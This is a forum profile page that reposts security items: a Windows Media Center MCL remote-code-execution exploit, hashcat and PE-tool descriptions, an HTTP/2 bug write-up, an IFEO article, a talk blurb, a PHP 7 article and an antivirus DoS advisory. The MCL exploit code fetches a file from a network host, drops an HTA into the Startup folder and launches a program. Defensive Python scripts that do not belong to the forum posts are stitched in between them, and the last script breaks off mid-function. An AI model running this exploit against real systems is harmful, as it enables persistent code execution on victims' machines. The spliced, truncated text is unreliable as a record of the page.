
Nytro (Administrators; 18715 posts; 701 days won)

Everything posted by Nytro

  1. Title: Microsoft Windows Media Center Library Parsing RCE Vuln aka "self-executing" MCL file (CVE-2015-6131)
     Software Vendor: Microsoft
     Software version: MS Windows Media Center latest version on any Windows OS.
     Software Vendor Homepage: http://www.microsoft.com
     CVE: CVE-2015-6131
     Exploit Author: Eduardo Braun Prado
     Vulnerability official discoverer: Zhang YunHai of NSFOCUS Security Team
     Date: December 8, 2015

     Vulnerability description: Windows Media Center contains a remote code execution vulnerability because it allows "MCL" files to reference themselves as HTML pages, which will be parsed inside the Windows Media Center window, in the context of the Local Machine security zone of the Internet Explorer browser. This in turn allows execution of arbitrary code using e.g. ADO ActiveX objects. AKA "self-executing" MCL files.

     Exploit code below:

     ----------- self-exec-1.mcl ------------------------------------
     <application url="self-exec1.mcl"/>
     <html>
     <script>alert(' I am running in local machine zone which allows arbitrary code execution via, for example, ADO Objects')</script>
     </html>
     ------------------------------------------------------------

     ---------- self-exec-2.mcl --------------------------------------
     <application url="self-exec2.mcl"/>
     <html>
     <b>Use a sniffer software to sniff SMB traffic and retrieve the remote Windows username required for this exploit</b>
     <img src=\\192.168.10.10\smbshare\someimg.jpg></img>
     <script>
     RecordsetURL='http://192.168.10.10:80/recordsetfile.txt';
     var rs = new ActiveXObject('ADODB.recordset');
     rs.Open(RecordsetURL);
     rs.Save('C:/users/windowsuser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.hta');
     rs.Close();
     </script>
     </html>
     ----------------------------------------------------------

     ----- Create-recordsetfile.hta --------------
     <html><body onload="aa()">
     <script language="VBScript">
     function aa()
     defdir="."
     alert "This script will retrieve data from ""recordsetdata.txt"" and save it to the current directory as ""recordsetfile.txt""."
     Set c = CreateObject("ADODB.Connection")
     co = "Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=" & defdir & ";Extensions=txt;"
     c.Open co
     set rs = CreateObject("ADODB.Recordset")
     rs.Open "SELECT * from recordsetdata.txt", c
     al=rs.Save(defdir & "\recordsetfile.txt")
     rs.close
     end function
     </script></body></html>
     -------------------------------------------------------------------------------

     --------- recordsetdata.txt ------------------------------------------
     <html>
     <script>a=new ActiveXObject('Wscript.Shell')</script>
     <script>a.Run('calc.exe',1);</script>
     </html>
     -------------------------------------------------------------------

     Source: https://www.exploit-db.com/exploits/38911/
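A small triage script for the pattern this advisory describes, added here as an example and not part of the exploit-db post: it flags .mcl files whose `<application url>` points back at the file itself, that carry HTML and inline script after the XML element, or that instantiate ActiveX objects. The sample contents are abbreviated forms of the two PoC files above plus a constructed benign library file, and the finding names and file names are assumptions.

```python
import re
import ntpath

# An MCL file is XML whose <application> element points Windows Media Center
# at an HTML page through its url attribute; the PoC makes it point at itself.
APP_URL = re.compile(r'<application\b[^>]*\burl\s*=\s*"([^"]*)"', re.I)
INLINE_SCRIPT = re.compile(r"<script\b", re.I)
# Object instantiation that only succeeds in the Local Machine zone.
ACTIVEX = re.compile(r"\b(?:new\s+ActiveXObject|CreateObject)\s*\(", re.I)


def scan_mcl(filename, text):
    """Return the list of findings for one .mcl file (its name and contents)."""
    findings = []
    m = APP_URL.search(text)
    if m:
        target = m.group(1).strip()
        # Compare bare file names so "x.mcl", ".\x.mcl" and "./x.mcl" all match.
        target_name = ntpath.basename(target.replace("/", "\\")).lower()
        if target_name == ntpath.basename(filename).lower():
            findings.append("self-reference")
        elif target_name.endswith(".mcl"):
            findings.append("mcl-chain")
    if "<html" in text.lower():          # HTML body riding inside an XML library file
        findings.append("embedded-html")
    if INLINE_SCRIPT.search(text):
        findings.append("inline-script")
    if ACTIVEX.search(text):
        findings.append("activex")
    return findings


def triage(files):
    """files: {name: contents}. Names whose findings include the two strong indicators."""
    return sorted(name for name, text in files.items()
                  if {"self-reference", "activex"} & set(scan_mcl(name, text)))


# Constructed samples: abbreviated copies of the advisory's PoC files and a benign file.
SELF_EXEC_1 = ('<application url="self-exec1.mcl"/><html><script>alert(\'I am running in '
               "local machine zone')</script></html>")
SELF_EXEC_2 = ('<application url="self-exec2.mcl"/><html>'
               "<img src=\\\\192.168.10.10\\smbshare\\someimg.jpg></img>"
               "<script>var rs = new ActiveXObject('ADODB.recordset');</script></html>")
BENIGN = '<application url="http://www.example.com/guide/index.html" name="Guide"/>'

if __name__ == "__main__":
    for name, text in {"self-exec1.mcl": SELF_EXEC_1, "self-exec2.mcl": SELF_EXEC_2,
                       "guide.mcl": BENIGN}.items():
        print(name, scan_mcl(name, text))
```

Run it over a directory by reading each .mcl into the `files` dictionary; an MCL that both references itself and calls `ActiveXObject` is the exact shape of self-exec-2.mcl.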
  2. Check out our GitHub Repository for the latest development version

     GPU Driver requirements:
     - NV users require ForceWare 346.59 or later
     - AMD users require Catalyst 14.9 or later

     Features
     - World's fastest password cracker
     - World's first and only GPGPU based rule engine
     - Free
     - Open-Source
     - Multi-GPU (up to 128 gpus)
     - Multi-Hash (up to 100 million hashes)
     - Multi-OS (Linux & Windows native binaries)
     - Multi-Platform (OpenCL & CUDA support)
     - Multi-Algo (see below)
     - Low resource utilization, you can still watch movies or play games while cracking
     - Focuses highly iterated modern hashes
     - Focuses dictionary based attacks
     - Supports distributed cracking
     - Supports pause / resume while cracking
     - Supports sessions
     - Supports restore
     - Supports reading words from file
     - Supports reading words from stdin
     - Supports hex-salt
     - Supports hex-charset
     - Built-in benchmarking system
     - Integrated thermal watchdog
     - 150+ Algorithms implemented with performance in mind
     - ... and much more

     oclHashcat Screenshot

     Attack-Modes
     - Straight *
     - Combination
     - Brute-force
     - Hybrid dict + mask
     - Hybrid mask + dict
     * accept Rules

     Link: oclHashcat - advanced password recovery
  3. RogueKillerPE

     Description
     RogueKillerPE is a PE parsing tool, able to show the internal structure of executable files. It's able to read either the memory image (process module) or the disk image (filesystem) of a given executable.

     RogueKillerPE 32 bits: Download (14 MB)
     RogueKillerPE 64 bits: Download (14 MB)

     Features:
     - Open PE from file, and read disk image.
     - Open PE from process, and read memory or disk image.
     - Open file from command line.
     - Drag and drop support.
     - Process general information (pid, parent, ...)
     - File general information (attributes, size, ...)
     - Process module general information (address, size, ...)
     - A bunch of hashes (MD5, SHA1, SHA256, ...)
     - Process memory pages, with ability to dump.
     - Injected pages detection, non-readable pages detection.
     - Ability to dump injected pages to file.
     - Hex code, with ability to search (hex values, or string ANSI/UNICODE).
     - Assembly code, with ability to navigate.
     - PE Headers (MZ, PE, Optional, ...)
     - RunPE detection, shows which header fields are modified.
     - Checksum validation.
     - PE Sections, with ability to watch hex code and dump to file.
     - PE Imports, with ability to watch APIs assembly code (memory only).
     - PE Exports, with ability to watch APIs assembly code.
     - Hooks detection in imports/exports (table and inline hooks).
     - PE Resources. Able to parse all well known types and display them accordingly (strings, version information, icons, ...)
     - Executable files detection in resources.
     - Ability to watch hex code of resources.
     - Ability to dump resources to file.
     - PDB path detection.
     - Strings scanner, with classification (Registry, files, ...)
     - Ability to dump all strings (by category or not) to file.

     User guide
     - Start the tool.
     - Drag a file on the interface, or load the process list.
     - If you choose a file, there you go.
     - If you choose a process, you can inspect a different module by selecting a new one in the modules list.
     - If you choose a process, you can toggle disk/image and switch from process memory to disk image and vice-versa.

     Source: RogueKillerPE download
  4. Attacking HTTP/2 Implementations

     Introduction

     Yahoo Pentest Team members Stuart Larsen (@xc0nradx) and John Villamil (@day6reak) presented original research at Pacsec 2015 on the HTTP/2 protocol, its security implications, and flaws discovered in a number of implementations. Through this presentation, summarized below, we hope to make the protocol a more popular research target. What follows is a summary of our presentation given at Pacsec 2015 (slides).

     HTTP/2 is a new technology that is already seeing widespread use across the Internet. There has been little security research into this new protocol, yet multiple implementations and widespread adoptions already exist. HTTP/2 lives in browsers, caching proxies, and libraries. It is the undisputed future of Internet connections and vulnerabilities in this protocol have the potential to cripple infrastructure.

     Our talk focused on threats, attack vectors, and vulnerabilities found during the course of our research. Two Firefox, two Apache Traffic Server (ATS), and four Node-http2 vulnerabilities will be discussed alongside the release of the first public HTTP/2 fuzzer. We showed how these bugs were found, their root cause, why they occur, and how to trigger them.

     We will also discuss http2fuzz, a fuzzer for both client and server endpoints of HTTP/2 connections. The fuzzer is open source and written in Go. It implements a large part of the HTTP/2 protocol and supports various frame types. It also includes a unique replay mechanism to help track down crash causing packets. We had previously blogged about two ATS bugs found by an earlier version of this fuzzer.

     Overview

     HTTP/1.1 came out back in 1999 and it was a huge step in bringing the web forward. But since then, websites have grown drastically, and HTTP had to be revisited. Today's sites are much more complex with many more interconnected dependencies. ISP speeds have improved and more bandwidth is available.

     The changes from HTTP/1.1 to HTTP/2 are all about performance. The major changes are:
     - Binary Protocol / Compression
     - Multiplexing
     - Server Push
     - Frames

     But these new changes in functionality and complexity also introduce additional attack surface to HTTP implementations.

     HPACK

     Originally, HTTP was stateless. It followed a very simple model to make a request and receive a response. But that also means lots of redundant information is sent. HPACK (RFC7541) was released to address these and other issues. HPACK is a binary header compression protocol. It uses dynamic lookup tables to store and retrieve headers. Headers only need to be sent once, and are remembered for future requests on the same connection. This differential encoding saves space and time and is a huge improvement over the vanilla protocol.

     Frames

     Frames are the fundamental unit of communication within HTTP/2. Here is a typical HTTP/2 header visualized:

     There are 10 different types of frames:
     - Headers
     - Data
     - Priority
     - Reset
     - Settings
     - Push
     - Ping
     - Goaway
     - Update
     - Continuation

     To learn more about individual frames, check out the RFC.

     Push Promise

     Push Promise is a new feature of HTTP/2 that allows you to push resources to a client before the client requests them. For example if a client requests /index.html, the server can probably assume the client will also want /logo.png.

     New Attack Surface
     - HPACK
     - Upgrades / Downgrades
     - Inconsistent Multiplexing
     - Malformed Frames
     - Pushing arbitrary data to client
     - Pushing arbitrary data to server
     - Stream dependencies
     - Invalid Frame States

     With all of this new attack surface we needed an automated way of getting good code coverage in HTTP2 implementations. For this we decided to build a new fuzzer.

     http2fuzz

     http2fuzz is a fuzzer written in golang for fuzzing HTTP/2 implementations in either server or client mode. It has a variety of strategies for both smart and dumb fuzzing. It can either rebuild valid frame structures with invalid data, or use completely random data. A big challenge in fuzzing is determining what payload actually caused the target to crash. We decided to build a replay feature that saves each frame that is sent. If a crash occurs, the replay list can be inspected and minimized to determine which payload was the cause of the crash.

     Bugs 1,2: Apache Traffic Server

     Our fuzzer discovered two remotely exploitable vulnerabilities in Apache Traffic Server. Both of these had the potential for arbitrary code execution. These bugs were covered in a previous blog post.

     Bug 3: Firefox HTTP/2 Malformed Header Frame DoS

     Normally a header frame consists of a pad length, stream dependency identifier, weight, block header fragment, and padding. If only a single byte is sent an integer underflow occurs which causes nsCString to try to allocate nearly 2^32 bytes of memory.

     HTTP2Session.cpp:1226
     [1226]: self->mDecompressBuffer.Append(self->mInputFrameBuffer + kFrameHeaderBytes + paddingControlBytes + promiseLen, self->mInputFrameDataSize - paddingControlBytes - promiseLen - paddingLength);
     [1226]: self->mDecompressBuffer.Append(ptr + uint8_t(9) + uint8_t(0) + uint16_t(0), uint32_t(1) - uint8_t(8) - uint32_t(5) - uint16_t(0));

     As shown above, an underflow is caused in the second parameter of the buffer decompress. These issues were addressed by the Firefox developers.

     Bug 4: Firefox HTTP/2 Malformed Push Promise DoS

     This bug is very similar to the previous bug except it occurs inside push promise.

     HTTP2Session.cpp:1634
     [1634]: self->mDecompressBuffer.Append(self->mInputFrameBuffer + kFrameHeaderBytes + paddingControlBytes + promiseLen, self->mInputFrameDataSize - paddingControlBytes - promiseLen - paddingLength);
     [1634]: self->mDecompressBuffer.Append(ptr + uint8_t(9) + uint8_t(1) + uint16_t(4), uint32_t(76) - uint8_t(1) - uint32_t(4) - uint16_t(75));

     Bugs 5-8: node-http2

     We found a number of bugs inside node-http2 through fuzzing. Most of them involve buffer out of bound reads or invalid state handling within JavaScript. These issues do not appear exploitable for arbitrary code execution but could be used to perform denial of service attacks against Node based web servers that use the package.

     https://github.com/molnarg/node-http2/issues/145
     https://github.com/molnarg/node-http2/issues/146
     https://github.com/molnarg/node-http2/issues/147
     https://github.com/molnarg/node-http2/issues/148

     [*] These issues have not been addressed by the project maintainers. The package no longer appears to be in active development.

     Conclusion

     HTTP/2 brings with it a lot of new attack surface. More research needs to be conducted on the implications of this protocol on web security. New tools need to be developed which handle the protocol and allow penetration testers to effectively audit HTTP/2 based web sites. Security products, including NIDS, will need to implement a subset of the protocol to effectively audit connections for malicious behavior or exploits. Lastly, more testing needs to be done on implementations of the protocol before they are enabled for popular use.

     Stuart Larsen and John Villamil of the Yahoo Pentest Team

     Source: http://yahoo-security.tumblr.com/post/134549767190/attacking-http2-implementations
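An added example, not taken from the talk or from http2fuzz: a minimal Python parser for HEADERS and PUSH_PROMISE frames that performs the length checks RFC 7540 requires before slicing out the header block fragment, next to the unchecked uint32 subtraction quoted from HTTP2Session.cpp. The three sample frames are constructed here; the one-byte HEADERS frame has the shape of bug 3 and the PUSH_PROMISE frame reproduces the 76 - 1 - 4 - 75 arithmetic of bug 4.

```python
import struct

# Frame types and flags from RFC 7540 (the "Headers" and "Push" frames above).
HEADERS, PUSH_PROMISE = 0x1, 0x5
FLAG_PADDED, FLAG_PRIORITY = 0x08, 0x20
FRAME_HEADER_LEN = 9   # 24-bit length, 8-bit type, 8-bit flags, 32-bit R + stream id


class ProtocolError(Exception):
    """Raised where a conforming endpoint must answer with PROTOCOL_ERROR."""


def build_frame(ftype, flags, stream_id, payload):
    """Serialise one frame; only used here to construct the sample frames."""
    if len(payload) > 0xFFFFFF:
        raise ValueError("payload exceeds the 24-bit length field")
    return (len(payload).to_bytes(3, "big") + bytes([ftype, flags])
            + struct.pack(">I", stream_id & 0x7FFFFFFF) + payload)


def parse_frame(buf):
    """Split one frame into header fields and payload."""
    if len(buf) < FRAME_HEADER_LEN:
        raise ProtocolError("short frame header")
    length = int.from_bytes(buf[:3], "big")
    ftype, flags = buf[3], buf[4]
    stream_id = struct.unpack(">I", buf[5:9])[0] & 0x7FFFFFFF
    payload = buf[FRAME_HEADER_LEN:FRAME_HEADER_LEN + length]
    if len(payload) != length:
        raise ProtocolError("truncated payload")
    return {"type": ftype, "flags": flags, "stream_id": stream_id, "payload": payload}


def _fixed_fields(frame):
    """Octets that sit between Pad Length and the header block fragment."""
    if frame["type"] == HEADERS and frame["flags"] & FLAG_PRIORITY:
        return 5   # E + stream dependency (4) + weight (1)
    if frame["type"] == PUSH_PROMISE:
        return 4   # R + promised stream id
    return 0


def header_block_fragment(frame):
    """Header block fragment of a HEADERS/PUSH_PROMISE frame, with bounds checks."""
    p, flags = frame["payload"], frame["flags"]
    pos = pad = 0
    if flags & FLAG_PADDED:
        if len(p) < 1:
            raise ProtocolError("PADDED flag set but no Pad Length octet")
        pad, pos = p[0], 1
    fixed = _fixed_fields(frame)
    if len(p) < pos + fixed:
        raise ProtocolError("payload shorter than its fixed fields")
    pos += fixed
    # RFC 7540 6.2: padding longer than the remaining payload is a PROTOCOL_ERROR.
    if pad > len(p) - pos:
        raise ProtocolError("Pad Length exceeds remaining payload")
    return p[pos:len(p) - pad]


def naive_fragment_length(frame):
    """The unchecked uint32 arithmetic of the quoted Firefox lines, for comparison."""
    p, flags = frame["payload"], frame["flags"]
    padding_control = 1 if flags & FLAG_PADDED else 0
    padding_length = p[0] if (padding_control and len(p) >= 1) else 0
    return (len(p) - padding_control - _fixed_fields(frame) - padding_length) & 0xFFFFFFFF


def rejects_frame(buf):
    """True when the checked parser refuses the frame."""
    try:
        header_block_fragment(parse_frame(buf))
    except ProtocolError:
        return True
    return False


# Constructed sample frames. 0x82 0x86 are HPACK static-table entries 2 and 6.
WELL_FORMED = build_frame(HEADERS, FLAG_PADDED | FLAG_PRIORITY, 1,
                          bytes([2]) + b"\x00\x00\x00\x00\x10" + b"\x82\x86" + b"\x00\x00")
ONE_BYTE_HEADERS = build_frame(HEADERS, FLAG_PRIORITY, 1, b"\x00")        # bug 3 shape
BAD_PUSH_PROMISE = build_frame(PUSH_PROMISE, FLAG_PADDED, 1,               # bug 4 numbers:
                               bytes([75]) + b"\x00" * 75)                # 76 - 1 - 4 - 75 < 0

if __name__ == "__main__":
    print(header_block_fragment(parse_frame(WELL_FORMED)).hex())
    for sample in (ONE_BYTE_HEADERS, BAD_PUSH_PROMISE):
        print(rejects_frame(sample), hex(naive_fragment_length(parse_frame(sample))))
```

Both malformed frames give `0xFFFFFFFC` under the unchecked subtraction, which is the "nearly 2^32 bytes" allocation the write-up describes; the checked version refuses them before any allocation happens.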
  5. An Introduction to Image File Execution Options
     December 4, 2015 | BY Pieter Arntz

     Image File Execution Options (IFEO) are used for debugging. Malware, however, does not only check if there are debuggers active, but it's also known to use the features IFEO has to offer to its own advantage.

     Intention
     IFEO settings are stored in the Windows registry. The intention of creating the IFEO registry key is to give developers the option to debug their software. This is relatively easy to do. Developers can attach any program to any executable using the registry key
     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\{name of the executable}
     and adding the value "Debugger"="{full path to the debugger}"

     For example, if you use Process Explorer, there is an option to "Replace Task Manager":

     Full article: https://blog.malwarebytes.org/development/2015/12/an-introduction-to-image-file-execution-options/
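An added example (not from the Malwarebytes article) for hunting the Debugger value the article describes: it parses a registry export in `.reg` syntax, lists every image that has a Debugger value under the IFEO key, and reports the ones whose debugger is not on an assumed allowlist of real debuggers. The registry content, the allowlist and the file names are all assumptions; a real `regedit /e` export is UTF-16 and must be decoded before being handed to `parse_reg`.

```python
import ntpath
import re

IFEO_PREFIX = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Image File Execution Options" + "\\")
# Assumed allowlist: binaries one expects to see as a legitimate IFEO debugger.
KNOWN_DEBUGGERS = {"procexp.exe", "procexp64.exe", "windbg.exe", "ntsd.exe",
                   "cdb.exe", "vsjitdebugger.exe"}

KEY_LINE = re.compile(r"^\[(.+)\]$")
VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def _unescape(s):
    """Undo .reg escaping: backslash escapes the following character."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_reg(text):
    """{key path: {value name: data}} for the string values of a .reg export."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        km = KEY_LINE.match(line)
        if km:
            current = km.group(1)
            keys.setdefault(current, {})
            continue
        vm = VALUE_LINE.match(line)
        if vm and current is not None:
            name, data = _unescape(vm.group(1)), vm.group(2)
            if data.startswith('"') and data.endswith('"'):   # REG_SZ; others kept raw
                data = _unescape(data[1:-1])
            keys[current][name] = data
    return keys


def ifeo_debuggers(text):
    """[(image name, Debugger command line)] for every IFEO subkey with a Debugger value."""
    out = []
    for key, values in parse_reg(text).items():
        if key.lower().startswith(IFEO_PREFIX.lower()) and "Debugger" in values:
            out.append((key[len(IFEO_PREFIX):], values["Debugger"]))
    return out


def debugger_binary(cmdline):
    """Base name of the first token of the Debugger command line (quoted or not)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        exe = cmdline[1:end] if end > 0 else cmdline[1:]
    else:
        exe = cmdline.split(" ", 1)[0]
    return ntpath.basename(exe).lower()


def suspicious_debuggers(text, allowlist=KNOWN_DEBUGGERS):
    return [(image, dbg) for image, dbg in ifeo_debuggers(text)
            if debugger_binary(dbg) not in allowlist]


# Constructed sample export: the Process Explorer "Replace Task Manager" entry,
# an entry pointing an editor at a user-writable path, and an unrelated IFEO value.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]
"Debugger"="\"C:\\Tools\\procexp.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Users\\Public\\updater.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"DisableExceptionChainValidation"=dword:00000000
'''

if __name__ == "__main__":
    for image, dbg in suspicious_debuggers(SAMPLE_REG):
        print("IFEO hijack candidate:", image, "->", dbg)
```

The allowlist is only a first filter: a debugger that lives under a user-writable directory, or an image like a login-screen accessibility tool, deserves a look even when the binary name is familiar.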
  6. DEF CON 23 Conference - Runa Sandvik, Michael Auger - Hacking a Linux-Powered Rifle TrackingPoint is an Austin startup known for making precision-guided firearms. These firearms ship with a tightly integrated system coupling a rifle, an ARM-powered scope running a modified version of Linux, and a linked trigger mechanism. The scope can follow targets, calculate ballistics and drastically increase its user's first shot accuracy. The scope can also record video and audio, as well as stream video to other devices using its own wireless network and mobile applications. In this talk, we will demonstrate how the TrackingPoint long range tactical rifle works. We will discuss how we reverse engineered the scope, the firmware, and three of TrackingPoint's mobile applications. We will discuss different use cases and attack surfaces. We will also discuss the security and privacy implications of network-connected firearms. Speaker Bios: Runa A. Sandvik is a privacy and security researcher, working at the intersection of technology, law and policy. She is a technical advisor to both the Freedom of the Press Foundation and the TrueCrypt Audit Project, and a member of the review board for Black Hat Europe. Twitter: @runasand Michael Auger is an experienced IT Security specialist with extensive experience in integrating and leveraging IT security tools. He has leveraged a wide range of IT security solutions, integrating them, to deliver leading edge incident response and security operations capabilities.
  7. PHP 7.0 arrives, so go forth and upgrade if you dare
     You get to play with a T_SPACESHIP operator, and much, much, more
     3 Dec 2015 at 08:34, Jack Skinner

     PHP 7.0 was launched today, so we've asked @Sydphp organiser and #phunconf convener Jack Skinner to explain its significance. Over to you, Jack ...

     PHP is the language we love to hate and often hate to love. After celebrating its 20th birthday earlier this year, it's clearly here to stay, not least because version 7 arrived today. From humble beginnings as a dangerous thought from Rasmus, PHP has grown to a monolith by software standards; depending on which benchmark you believe, it drives up to 81 per cent of the web.

     The latest release has arguably taken the internals team eight years to complete, although many of the original features were rolled into existing stable releases. As work on unicode started to fray at the edges, the team decided to push core language features into versions 5.3, 5.4, and 5.5. The latest rendition of the 5 series will be around for another two years before being officially deprecated and off the security maintenance list. Because deprecating old versions has worked so far in the past (looks at Windows XP).

     Today's release was kickstarted again in late 2013 with the new internal engine dubbed 'next gen' or, for the less hipster among us, 'phpng'. ng brought the engine almost up to par with competitor interpreters like hhvm from Facebook (which of course has outperformed PHP core for many years). A year's effort in 2014 more than doubled CPU and memory optimisation in the core engine and was eventually merged into core. Depending on which benchmarks you make yourself, PHP 7 halves (or better) both memory and CPU instructions from the latest 5.6 releases. Even as pure marketing spiel, that's an impressive benchmark for a major language release.

     So version 6 was sent off to the glue factory, PHP 5 got the shiny new features and thus PHP 7 got shiny new hotrod wheels and a confusing release number.

     It's fast, so what?
     It's not just the new hot wheels look to the language that has web devs excited. PHP 7 also ships with a circus full of new features. For example, after 20 years the language is finally getting an internal Abstract Syntax Tree for static analysis. Something Java has had for, oh, about a decade. It's also worth noting that with fond memories of PHP Sadness in our hearts there's also a much improved and more consistent variable syntax! Of course uniform variable syntax (as it's known to the devs) breaks everything and naturally that's PHP's version of consistent, since the age old argument between array and string function arguments remains con...unchanged (what... did you expect a pun?)

     With so much changed, PHP 7 is almost certainly not backwards compatible with your existing code, especially if you're running anything remotely legacy (yes, even you there with the 'updated' PHP 4 project). With many operators and corner cases being broken fixed, a long laborious task awaits any project unwilling or unable to provide decent test coverage. So much so that we're predicting soapboxes will be in short supply as geeks announce their test suite coverage to the world in an attempt to upgrade.

     Finally a language that speaks my language!
     A lot of the debate that killed PHP v6 was the implementation of full, native unicode support and after so many years being unable to say hello world in emoji who can blame the team for wanting to update. It's almost a non-issue now that PHP 7 can not only have the pile-of-poop emoji as a variable name, but also reliably use it as a string internally. A whole new release just for emoji fun!

     Since programmers are lazy there's also a raft of new syntax additions, mostly around shortening of certain statements. In fact with new ??, ?: and <=> operators and shortened namespace syntax we're wondering if PHP is slowly becoming the brainf*ck of the web. PHP 8 maybe?

     Shooting for the stars
     Releasing a new version should be easy right? Especially with the new perl-inspired (or for the script-hipsters among us, ruby inspired) T_SPACESHIP operator (no really, that's what PHP 7 calls <=> internally!). Quite a few projects, however, have been proactive over the last year; almost all the major frameworks and CMSs are claiming full compatibility with the new version at or close to launch. WordPress, for example, officially aims to have PHP 7 compatibility on or soon after release day, whereas Drupal has steamrolled straight ahead with the Drupal 8 launch last week and included PHP 7 out of the box. Unfortunately, there's still no word from Joomla; they're probably still recovering from last month's global summit after-party.

     On the framework front, Zend Framework and Symfony have both announced their respective PHP 7 support, but naturally enterprise release cycles will slow down any adoption. At least the core projects maintain support. As with everything, your dependencies might take a while. #upgradecycledrama

     Go forth and upgrade!
     One would think after 20 years the team would have practice, but the internals team recently spent a few days playing "that's not a bug, THIS is a bug" and debating release day just a little longer. According to bug reports the count() function couldn't count, which is fine if you're not planning to release it into the wild! Don't worry, internals finally stopped throwing sand across the playground and agreed on an eighth release candidate before release. It's fixed now (I'm told).

     Upgrade to PHP 7 on launch day? I, too, like to live dangerously! But with PHP 7 and its shiny new feature list coming to a repository near you, it's safe to say PHP isn't going the way of the dinosaur just yet.

     Source: http://www.theregister.co.uk/2015/12/03/php_70_arrives_complete_with_ttt_spaceshiptt_operator/
  8. Malwarebytes Antivirus 2.2.0 - DoS PoC

     #####################################################################################
     Application: Malwarebytes Antivirus
     Platforms: Windows
     Versions: 2.2.0.
     CVE: No CVE has been assigned
     Author: Francis Provencher of COSIG
     Twitter: @cosiG_
     #####################################################################################

     1) Introduction
     2) Report Timeline
     3) Technical details
     4) POC

     #####################################################################################

     ===============
     1) Introduction
     ===============

     Malwarebytes Anti-Malware (MBAM) is an application for computers running under the Microsoft Windows and Apple OS X operating systems that finds and removes malware. Made by Malwarebytes Corporation, it was first released in January 2008. It is available in a free version, which scans for and removes malware when started manually, and a paid version, which additionally provides scheduled scans, real-time protection and a flash memory scanner. (http://www.oracle.com/us/technologies/embedded/025613.htm)

     #####################################################################################

     ============================
     2) Report Timeline
     ============================

     2015-11-28: Francis Provencher of COSIG found the issue;
     2015-11-30: Francis Provencher of COSIG reported the vulnerability to Malwarebytes;
     2015-12-02: Malwarebytes released a patch for this issue;

     #####################################################################################

     ============================
     3) Technical details
     ============================

     When a malformed executable with an invalid integer (-1) in the "SizeOfRawData" of the UPX section is parsed by Malwarebytes, memory corruption occurs. Successful exploitation of the vulnerabilities may allow execution of arbitrary code.

     #####################################################################################

     ===========
     4) POC
     ===========

     https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38858.exe

     Source: https://www.exploit-db.com/exploits/38858/
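Two of the PE checks mentioned on this page, "Checksum validation" in the RogueKillerPE feature list (post 3) and the SizeOfRawData = -1 parsing crash in this advisory, as an added example that is neither tool's code: a small PE32 parser that validates OptionalHeader.CheckSum with the imagehlp algorithm and bounds-checks each section's raw data range with arbitrary-precision integers, next to the 32-bit check that an `0xFFFFFFFF` SizeOfRawData wraps past. The sample PE is constructed in the script; the section name, sizes and file length are assumptions.

```python
import struct

# Minimal PE32 layout used for the constructed sample (real headers vary in size).
DOS_HEADER_LEN = 0x40
COFF_HEADER_LEN = 20
OPT_HEADER_LEN = 0xE0           # PE32 optional header including 16 data directories
SECTION_HEADER_LEN = 40
CHECKSUM_OFFSET_IN_OPT = 64     # OptionalHeader.CheckSum, same offset for PE32 and PE32+


def build_sample_pe(size_of_raw_data, checksum=0, file_size=0x400):
    """Constructed one-section PE32: a UPX-style section with a chosen SizeOfRawData."""
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", DOS_HEADER_LEN)    # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, OPT_HEADER_LEN, 0x0102)
    opt = bytearray(OPT_HEADER_LEN)
    struct.pack_into("<H", opt, 0, 0x10B)                    # Magic: PE32
    struct.pack_into("<I", opt, CHECKSUM_OFFSET_IN_OPT, checksum)
    struct.pack_into("<I", opt, 92, 16)                      # NumberOfRvaAndSizes
    section = struct.pack("<8sIIIIIIHHI", b"UPX0", 0x1000, 0x1000,
                          size_of_raw_data, 0x200, 0, 0, 0, 0, 0x60000020)
    image = dos + b"PE\x00\x00" + coff + bytes(opt) + section
    return image + b"\x00" * (file_size - len(image))


def parse_pe(data):
    """Locate the CheckSum field and the section table; raises on a non-PE blob."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + COFF_HEADER_LEN
    checksum_off = opt + CHECKSUM_OFFSET_IN_OPT
    sections = []
    for i in range(nsections):
        off = opt + opt_size + i * SECTION_HEADER_LEN
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        sections.append({"name": name.rstrip(b"\x00").decode("ascii", "replace"),
                         "raw_size": raw_size, "raw_ptr": raw_ptr})
    return {"checksum_offset": checksum_off,
            "checksum": struct.unpack_from("<I", data, checksum_off)[0],
            "sections": sections}


def naive_in_bounds_32(raw_ptr, raw_size, file_len):
    """C-style uint32 check: PointerToRawData + 0xFFFFFFFF wraps and 'fits'."""
    return ((raw_ptr + raw_size) & 0xFFFFFFFF) <= file_len


def check_sections(data):
    """Findings for sections whose raw data range does not fit inside the file."""
    findings = []
    for s in parse_pe(data)["sections"]:
        end = s["raw_ptr"] + s["raw_size"]              # Python ints do not wrap
        if end > len(data):
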